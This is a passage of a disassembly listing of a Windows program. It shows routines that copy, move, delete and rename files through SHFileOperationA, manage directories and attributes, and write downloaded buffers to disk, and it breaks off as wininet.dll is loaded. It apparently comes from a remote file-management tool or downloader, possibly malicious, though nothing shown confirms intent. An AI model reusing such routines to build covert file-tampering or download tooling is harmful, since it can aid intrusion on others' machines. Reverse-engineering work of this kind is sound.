call dword_433078 ; lstrcatA
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
cmp [ebp+arg_C], 0
jle short loc_421B5E
mov ecx, [ebp+arg_C]
sub ecx, 1
mov [ebp+arg_C], ecx
cmp [ebp+arg_C], 0
jnz short loc_421B5E
jmp short loc_421B60
; ---------------------------------------------------------------------------
loc_421B5E: ; CODE XREF: sub_421ACF+7C�j
; sub_421ACF+8B�j
jmp short loc_421B00
; ---------------------------------------------------------------------------
loc_421B60: ; CODE XREF: sub_421ACF+3C�j
; sub_421ACF+8D�j
push offset a8b ; "8B"
mov ecx, [ebp+arg_0]
call sub_43162A
mov edx, [ebp+var_2004]
or edx, 1
mov [ebp+var_2004], edx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 10h
sub_421ACF endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_439C68
mov [ebp-230h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-22Fh]
rep stosd
stosb
mov cl, ds:byte_439C6C
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-230h]
push eax
call sub_422680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_422680
add esp, 0Ch
lea eax, [ebp-230h]
push eax
call sub_4221DB
add esp, 4
cmp eax, 1
jnz short loc_421C24
push 10000000h
call dword_43307C ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_421C8D
; ---------------------------------------------------------------------------
loc_421C24: ; CODE XREF: HLXc:00421C13�j
push 1Eh
push 0
lea ecx, [ebp-128h]
push ecx
call sub_431752 ; memset
add esp, 0Ch
lea edx, [ebp-230h]
mov [ebp-120h], edx
lea eax, [ebp-108h]
mov [ebp-11Ch], eax
mov dword ptr [ebp-124h], 2
mov word ptr [ebp-118h], 80h
cmp dword ptr [ebp+10h], 0
jz short loc_421C7B
mov cx, [ebp-118h]
or cx, 210h
mov [ebp-118h], cx
loc_421C7B: ; CODE XREF: HLXc:00421C66�j
lea edx, [ebp-128h]
push edx
call dword_433288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
loc_421C8D: ; CODE XREF: HLXc:00421C22�j
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C92 proc near ; CODE XREF: sub_422C48+174�p
; sub_422C48+195�p ...
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = word ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_421C92
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov al, ds:byte_439C70
mov [ebp+var_13C], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_13B]
rep stosd
stosb
push 104h
mov ecx, [ebp+arg_0]
push ecx
lea edx, [ebp+var_13C]
push edx
call sub_422680
add esp, 0Ch
lea eax, [ebp+var_13C]
push eax
call sub_4221DB
add esp, 4
cmp eax, 1
jnz short loc_421D0D
push 10000000h
call dword_43307C ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_421D79
; ---------------------------------------------------------------------------
loc_421D0D: ; CODE XREF: sub_421C92+6A�j
push 1Eh
push 0
lea ecx, [ebp+var_34]
push ecx
call sub_431752 ; memset
add esp, 0Ch
lea edx, [ebp+var_13C]
mov [ebp+var_2C], edx
mov [ebp+var_30], 3
mov [ebp+var_24], 694h
mov [ebp+var_14], 0FFFFFFFFh
mov [ebp+var_4], 0
push 20h
call dword_4330E0 ; Sleep
lea eax, [ebp+var_34]
push eax
call dword_433288 ; SHFileOperationA
mov [ebp+var_14], eax
jmp short loc_421D69
; ---------------------------------------------------------------------------
mov ecx, [ebp+var_140]
call sub_431630
mov eax, offset loc_421D69
retn
; ---------------------------------------------------------------------------
loc_421D69: ; CODE XREF: sub_421C92+C4�j
; DATA XREF: sub_421C92+D1�o
mov [ebp+var_4], 0FFFFFFFFh
xor eax, eax
cmp [ebp+var_14], 0
setz al
loc_421D79: ; CODE XREF: sub_421C92+79�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D8A proc near ; CODE XREF: sub_422C48+153�p
; sub_4245AA+1B7�p ...
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_439C74
mov [ebp+var_230], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_22F]
rep stosd
stosb
mov cl, ds:byte_439C78
mov [ebp+var_108], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosb
push 104h
mov edx, [ebp+arg_0]
push edx
lea eax, [ebp+var_230]
push eax
call sub_422680
add esp, 0Ch
push 104h
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_108]
push edx
call sub_422680
add esp, 0Ch
lea eax, [ebp+var_230]
push eax
call sub_4221DB
add esp, 4
cmp eax, 1
jnz short loc_421E1E
push 10000000h
call dword_43307C ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_421E81
; ---------------------------------------------------------------------------
loc_421E1E: ; CODE XREF: sub_421D8A+83�j
push 1Eh
push 0
lea ecx, [ebp+var_128]
push ecx
call sub_431752 ; memset
add esp, 0Ch
lea edx, [ebp+var_230]
mov [ebp+var_120], edx
lea eax, [ebp+var_108]
mov [ebp+var_11C], eax
mov [ebp+var_124], 4
mov [ebp+var_118], 80h
mov cx, [ebp+var_118]
or cx, 614h
mov [ebp+var_118], cx
lea edx, [ebp+var_128]
push edx
call dword_433288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
loc_421E81: ; CODE XREF: sub_421D8A+92�j
pop edi
mov esp, ebp
pop ebp
retn
sub_421D8A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_439C7C
mov [ebp-230h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-22Fh]
rep stosd
stosb
mov cl, ds:byte_439C80
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-230h]
push eax
call sub_422680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_422680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-128h]
push eax
call sub_431752 ; memset
add esp, 0Ch
lea ecx, [ebp-230h]
mov [ebp-120h], ecx
lea edx, [ebp-108h]
mov [ebp-11Ch], edx
mov dword ptr [ebp-124h], 2
cmp dword ptr [ebp+10h], 0
jz short loc_421F44
mov ax, [ebp-118h]
or ax, 210h
mov [ebp-118h], ax
loc_421F44: ; CODE XREF: HLXc:00421F30�j
lea ecx, [ebp-128h]
push ecx
call dword_433288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 234h
push edi
mov al, ds:byte_439C84
mov [ebp-234h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-233h]
rep stosd
stosb
push 104h
mov ecx, [ebp+8]
push ecx
lea edx, [ebp-234h]
push edx
call sub_422680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-24h]
push eax
call sub_431752 ; memset
add esp, 0Ch
lea ecx, [ebp-234h]
mov [ebp-1Ch], ecx
mov dword ptr [ebp-20h], 3
cmp dword ptr [ebp+0Ch], 0
jz short loc_421FCB
mov dx, [ebp-14h]
or dx, 210h
mov [ebp-14h], dx
loc_421FCB: ; CODE XREF: HLXc:00421FBC�j
mov al, ds:byte_439C88
mov [ebp-12Ch], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-12Bh]
rep stosd
lea ecx, [ebp-12Ch]
push ecx
push 104h
call dword_43302C ; GetCurrentDirectoryA
mov dword ptr [ebp-4], 1
loc_421FFE: ; CODE XREF: HLXc:00422030�j
cmp dword ptr [ebp-4], 0
jz short loc_422032
lea edx, [ebp-234h]
push edx
lea eax, [ebp-12Ch]
push eax
call sub_42239F
add esp, 8
test eax, eax
jnz short loc_422032
lea ecx, [ebp-12Ch]
push ecx
call sub_422296
add esp, 4
mov [ebp-4], eax
jmp short loc_421FFE
; ---------------------------------------------------------------------------
loc_422032: ; CODE XREF: HLXc:00422002�j
; HLXc:0042201C�j
lea edx, [ebp-24h]
push edx
call dword_433288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 33Ch
push edi
mov al, ds:byte_439C8C
mov [ebp-33Ch], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-33Bh]
rep stosd
stosb
mov cl, ds:byte_439C90
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-33Ch]
push eax
call sub_422680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_422680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-12Ch]
push eax
call sub_431752 ; memset
add esp, 0Ch
lea ecx, [ebp-33Ch]
mov [ebp-124h], ecx
lea edx, [ebp-108h]
mov [ebp-120h], edx
mov dword ptr [ebp-128h], 1
cmp dword ptr [ebp+10h], 0
jz short loc_422104
mov ax, [ebp-11Ch]
or ax, 210h
mov [ebp-11Ch], ax
loc_422104: ; CODE XREF: HLXc:004220F0�j
mov cl, ds:byte_439C94
mov [ebp-234h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-233h]
rep stosd
lea edx, [ebp-234h]
push edx
push 104h
call dword_43302C ; GetCurrentDirectoryA
mov dword ptr [ebp-10Ch], 1
loc_42213B: ; CODE XREF: HLXc:00422180�j
cmp dword ptr [ebp-10Ch], 0
jz short loc_422182
lea eax, [ebp-33Ch]
push eax
lea ecx, [ebp-234h]
push ecx
call sub_42239F
add esp, 8
test eax, eax
jnz short loc_422182
push 0
call sub_422296
add esp, 4
mov [ebp-10Ch], eax
lea edx, [ebp-234h]
push edx
push 104h
call dword_43302C ; GetCurrentDirectoryA
jmp short loc_42213B
; ---------------------------------------------------------------------------
loc_422182: ; CODE XREF: HLXc:00422142�j
; HLXc:0042215C�j
lea eax, [ebp-12Ch]
push eax
call dword_433288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422199 proc near ; CODE XREF: sub_4249D2+F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
mov eax, [ebp+arg_0]
push eax
call dword_433030 ; CreateDirectoryA
pop ebp
retn
sub_422199 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call dword_433034 ; RemoveDirectoryA
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call dword_433038 ; SetFileAttributesA
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call dword_43303C ; GetFileAttributesA
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4221DB proc near ; CODE XREF: HLXc:00421C08�p
; sub_421C92+5F�p ...
var_144 = dword ptr -144h
var_140 = dword ptr -140h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 144h
push 140h
push 0
lea eax, [ebp+var_140]
push eax
call sub_431752 ; memset
add esp, 0Ch
lea ecx, [ebp+var_140]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_433080 ; FindFirstFileA
mov [ebp+var_144], eax
cmp [ebp+var_144], 0FFFFFFFFh
jnz short loc_42221E
xor eax, eax
jmp short loc_422292
; ---------------------------------------------------------------------------
loc_42221E: ; CODE XREF: sub_4221DB+3D�j
mov eax, [ebp+var_140]
or al, 10h
cmp [ebp+var_140], eax
jnz short loc_422280
loc_42222E: ; CODE XREF: sub_4221DB:loc_42226A�j
lea ecx, [ebp+var_140]
push ecx
mov edx, [ebp+var_144]
push edx
call dword_433084 ; FindNextFileA
test eax, eax
jz short loc_42226C
mov eax, [ebp+var_140]
or al, 10h
cmp [ebp+var_140], eax
jz short loc_42226A
mov ecx, [ebp+var_144]
push ecx
call dword_433040 ; FindClose
mov eax, 2
jmp short loc_422292
; ---------------------------------------------------------------------------
loc_42226A: ; CODE XREF: sub_4221DB+79�j
jmp short loc_42222E
; ---------------------------------------------------------------------------
loc_42226C: ; CODE XREF: sub_4221DB+69�j
mov edx, [ebp+var_144]
push edx
call dword_433040 ; FindClose
mov eax, 1
jmp short loc_422292
; ---------------------------------------------------------------------------
loc_422280: ; CODE XREF: sub_4221DB+51�j
mov eax, [ebp+var_144]
push eax
call dword_433040 ; FindClose
mov eax, 2
loc_422292: ; CODE XREF: sub_4221DB+41�j
; sub_4221DB+8D�j ...
mov esp, ebp
pop ebp
retn
sub_4221DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422296 proc near ; CODE XREF: HLXc:00422025�p
; HLXc:00422160�p
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push edi
mov al, ds:byte_439C98
mov [ebp+var_10C], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
lea ecx, [ebp+var_10C]
push ecx
push 104h
call dword_43302C ; GetCurrentDirectoryA
lea edx, [ebp+var_10C]
push edx
call sub_422435
add esp, 4
movsx eax, al
test eax, eax
jz short loc_4222E9
xor eax, eax
jmp loc_42239A
; ---------------------------------------------------------------------------
loc_4222E9: ; CODE XREF: sub_422296+4A�j
lea ecx, [ebp+var_10C]
push ecx
call sub_43175E ; strlen
add esp, 4
mov [ebp+var_110], eax
mov edx, [ebp+var_110]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_422315
; ---------------------------------------------------------------------------
loc_42230C: ; CODE XREF: sub_422296:loc_42237D�j
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_422315: ; CODE XREF: sub_422296+74�j
cmp [ebp+var_4], 0
jl short loc_42237F
mov ecx, [ebp+var_4]
movsx edx, [ebp+ecx+var_10C]
cmp edx, 5Ch
jnz short loc_42237D
mov eax, [ebp+var_4]
mov [ebp+eax+var_10C], 0
cmp [ebp+arg_0], 0
jz short loc_42234F
lea ecx, [ebp+var_10C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_431758 ; strcpy
add esp, 8
loc_42234F: ; CODE XREF: sub_422296+A4�j
lea eax, [ebp+var_10C]
push eax
call sub_422435
add esp, 4
movsx ecx, al
test ecx, ecx
jz short loc_422369
xor eax, eax
jmp short loc_42239A
; ---------------------------------------------------------------------------
loc_422369: ; CODE XREF: sub_422296+CD�j
lea edx, [ebp+var_10C]
push edx
call dword_433048 ; SetCurrentDirectoryA
mov eax, 1
jmp short loc_42239A
; ---------------------------------------------------------------------------
loc_42237D: ; CODE XREF: sub_422296+93�j
jmp short loc_42230C
; ---------------------------------------------------------------------------
loc_42237F: ; CODE XREF: sub_422296+83�j
cmp [ebp+arg_0], 0
jz short loc_422398
lea eax, [ebp+var_10C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_431758 ; strcpy
add esp, 8
loc_422398: ; CODE XREF: sub_422296+ED�j
xor eax, eax
loc_42239A: ; CODE XREF: sub_422296+4E�j
; sub_422296+D1�j ...
pop edi
mov esp, ebp
pop ebp
retn
sub_422296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42239F proc near ; CODE XREF: HLXc:00422012�p
; HLXc:00422152�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov eax, [ebp+arg_0]
push eax
call sub_43175E ; strlen
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
push ecx
call sub_43175E ; strlen
add esp, 4
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
sub edx, 1
cmp [ebp+var_4], edx
jb short loc_4223D3
xor eax, eax
jmp short loc_422430
; ---------------------------------------------------------------------------
loc_4223D3: ; CODE XREF: sub_42239F+2E�j
mov [ebp+var_8], 0
jmp short loc_4223E5
; ---------------------------------------------------------------------------
loc_4223DC: ; CODE XREF: sub_42239F:loc_42241D�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4223E5: ; CODE XREF: sub_42239F+3B�j
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jnb short loc_42241F
mov edx, [ebp+arg_0]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
push eax
call dword_4331F4 ; toupper
add esp, 4
mov esi, eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
push edx
call dword_4331F4 ; toupper
add esp, 4
cmp esi, eax
jz short loc_42241D
xor eax, eax
jmp short loc_422430
; ---------------------------------------------------------------------------
loc_42241D: ; CODE XREF: sub_42239F+78�j
jmp short loc_4223DC
; ---------------------------------------------------------------------------
loc_42241F: ; CODE XREF: sub_42239F+4C�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
xor eax, eax
cmp ecx, 5Ch
setz al
loc_422430: ; CODE XREF: sub_42239F+32�j
; sub_42239F+7C�j
pop esi
mov esp, ebp
pop ebp
retn
sub_42239F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422435 proc near ; CODE XREF: sub_422296+3D�p
; sub_422296+C0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call sub_43175E ; strlen
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jl short loc_422454
cmp [ebp+var_4], 3
jle short loc_422458
loc_422454: ; CODE XREF: sub_422435+17�j
xor al, al
jmp short loc_4224B1
; ---------------------------------------------------------------------------
loc_422458: ; CODE XREF: sub_422435+1D�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
push edx
call dword_4331F4 ; toupper
add esp, 4
cmp eax, 41h
jl short loc_422482
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call dword_4331F4 ; toupper
add esp, 4
cmp eax, 5Ah
jle short loc_422486
loc_422482: ; CODE XREF: sub_422435+36�j
xor al, al
jmp short loc_4224B1
; ---------------------------------------------------------------------------
loc_422486: ; CODE XREF: sub_422435+4B�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+1]
cmp eax, 3Ah
jz short loc_422496
xor al, al
jmp short loc_4224B1
; ---------------------------------------------------------------------------
loc_422496: ; CODE XREF: sub_422435+5B�j
cmp [ebp+var_4], 3
jnz short loc_4224AC
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx+2]
cmp edx, 5Ch
jz short loc_4224AC
xor al, al
jmp short loc_4224B1
; ---------------------------------------------------------------------------
loc_4224AC: ; CODE XREF: sub_422435+65�j
; sub_422435+71�j
mov eax, [ebp+arg_0]
mov al, [eax]
loc_4224B1: ; CODE XREF: sub_422435+21�j
; sub_422435+4F�j ...
mov esp, ebp
pop ebp
retn
sub_422435 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4224B5 proc near ; CODE XREF: HLXc:0042257F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
push eax
call dword_4331EC ; ftell
add esp, 4
mov [ebp+var_4], eax
push 2
push 0
mov ecx, [ebp+arg_0]
push ecx
call dword_4331F0 ; fseek
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
call dword_4331EC ; ftell
add esp, 4
mov [ebp+var_8], eax
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_4331F0 ; fseek
add esp, 0Ch
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_4224B5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_431C9C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
mov [ebp-34h], ecx
mov dword ptr [ebp-30h], 0
mov dword ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_43164E
mov byte ptr [ebp-4], 2
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-10h], 0
push offset aR_0 ; "r"
lea ecx, [ebp+0Ch]
call sub_4226A0
push eax
call dword_4331C4 ; fopen
add esp, 8
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0
jz short loc_4225E0
mov eax, [ebp-24h]
push eax
mov ecx, [ebp-34h]
call sub_4224B5
mov [ebp-14h], eax
mov ecx, [ebp-14h]
push ecx
call dword_4331C8 ; malloc
add esp, 4
mov [ebp-10h], eax
mov dword ptr [ebp-28h], 0
jmp short loc_4225A9
; ---------------------------------------------------------------------------
loc_4225A0: ; CODE XREF: HLXc:004225BA�j
mov edx, [ebp-28h]
add edx, 1
mov [ebp-28h], edx
loc_4225A9: ; CODE XREF: HLXc:0042259E�j
mov eax, [ebp-28h]
cmp eax, [ebp-14h]
jge short loc_4225BC
mov ecx, [ebp-10h]
add ecx, [ebp-28h]
mov byte ptr [ecx], 0Ah
jmp short loc_4225A0
; ---------------------------------------------------------------------------
loc_4225BC: ; CODE XREF: HLXc:004225AF�j
mov edx, [ebp-24h]
push edx
push 1
mov eax, [ebp-14h]
push eax
mov ecx, [ebp-10h]
push ecx
call dword_433254 ; fread
add esp, 10h
mov edx, [ebp-24h]
push edx
call dword_4331D0 ; fclose
add esp, 4
loc_4225E0: ; CODE XREF: HLXc:00422576�j
cmp dword ptr [ebp-10h], 0
jz short loc_422630
mov eax, [ebp-14h]
push eax
push 0
mov ecx, [ebp-10h]
push ecx
lea edx, [ebp-2Ch]
push edx
lea ecx, [ebp-20h]
call sub_421ACF
mov [ebp-38h], eax
mov eax, [ebp-38h]
mov [ebp-3Ch], eax
mov byte ptr [ebp-4], 3
mov ecx, [ebp-3Ch]
push ecx
lea ecx, [ebp-1Ch]
call sub_431648
mov byte ptr [ebp-4], 2
lea ecx, [ebp-2Ch]
call sub_431642
mov edx, [ebp-10h]
push edx
call dword_4331D4 ; free
add esp, 4
jmp short loc_42263D
; ---------------------------------------------------------------------------
loc_422630: ; CODE XREF: HLXc:004225E4�j
push offset dword_439C9C
lea ecx, [ebp-1Ch]
call sub_43163C
loc_42263D: ; CODE XREF: HLXc:0042262E�j
lea eax, [ebp-1Ch]
push eax
mov ecx, [ebp+8]
call sub_431636
mov ecx, [ebp-30h]
or ecx, 1
mov [ebp-30h], ecx
mov byte ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_431642
mov byte ptr [ebp-4], 0
lea ecx, [ebp+0Ch]
call sub_431642
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422680 proc near ; CODE XREF: HLXc:00421BE1�p
; HLXc:00421BF9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_433200 ; _mbsnbcpy
add esp, 0Ch
pop ebp
retn
sub_422680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226A0 proc near ; CODE XREF: HLXc:00422560�p
; sub_4266E9+1D�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
mov esp, ebp
pop ebp
retn
sub_4226A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226B0 proc near ; CODE XREF: sub_422A1E+7F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4332DC
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4226B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226C7 proc near ; CODE XREF: sub_4229F0+A�p
; sub_422BB1+26�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4332DC
mov esp, ebp
pop ebp
retn
sub_4226C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226DB proc near ; CODE XREF: sub_422C48+A6�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
mov [ebp+var_8], 0
mov [ebp+var_4], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_14]
call sub_4227A4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jbe loc_422798
cmp [ebp+arg_4], 0
jz short loc_422776
push 0
push 8000000h
push 2
push 0
push 0
push 40000000h
mov edx, [ebp+arg_4]
push edx
call dword_433018 ; CreateFileA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_42273E
xor al, al
jmp short loc_42279E
; ---------------------------------------------------------------------------
loc_42273E: ; CODE XREF: sub_4226DB+5D�j
mov [ebp+var_C], 0
push 0
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_14]
mov eax, [edx+4]
push eax
mov ecx, [ebp+var_10]
push ecx
call dword_433050 ; WriteFile
mov edx, [ebp+var_10]
push edx
call dword_433020 ; CloseHandle
mov eax, [ebp+var_C]
cmp eax, [ebp+var_4]
jz short loc_422776
xor al, al
jmp short loc_42279E
; ---------------------------------------------------------------------------
loc_422776: ; CODE XREF: sub_4226DB+38�j
; sub_4226DB+95�j
mov ecx, [ebp+var_14]
cmp dword ptr [ecx+4], 0
jz short loc_422796
mov edx, [ebp+var_14]
mov eax, [edx+4]
push eax
call dword_43304C ; GlobalFree
mov ecx, [ebp+var_14]
mov dword ptr [ecx+4], 0
loc_422796: ; CODE XREF: sub_4226DB+A2�j
jmp short loc_42279C
; ---------------------------------------------------------------------------
loc_422798: ; CODE XREF: sub_4226DB+2E�j
xor al, al
jmp short loc_42279E
; ---------------------------------------------------------------------------
loc_42279C: ; CODE XREF: sub_4226DB:loc_422796�j
mov al, 1
loc_42279E: ; CODE XREF: sub_4226DB+61�j
; sub_4226DB+99�j ...
mov esp, ebp
pop ebp
retn 8
sub_4226DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4227A4 proc near ; CODE XREF: sub_4226DB+22�p
; sub_422EC3+35�p
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2028 = dword ptr -2028h
var_2024 = dword ptr -2024h
var_2020 = byte ptr -2020h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2034h
call sub_431700
mov [ebp+var_2034], ecx
cmp [ebp+arg_0], 0
jnz short loc_4227C4
xor eax, eax
jmp loc_4229EA
; ---------------------------------------------------------------------------
loc_4227C4: ; CODE XREF: sub_4227A4+17�j
mov eax, [ebp+var_2034]
cmp dword ptr [eax+4], 0
jz short loc_4227ED
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
push edx
call dword_43304C ; GlobalFree
mov eax, [ebp+var_2034]
mov dword ptr [eax+4], 0
loc_4227ED: ; CODE XREF: sub_4227A4+2A�j
push offset aWininet_dll ; "wininet.dll"
call dword_4330DC ; LoadLibraryA
mov [ebp+var_1C], eax
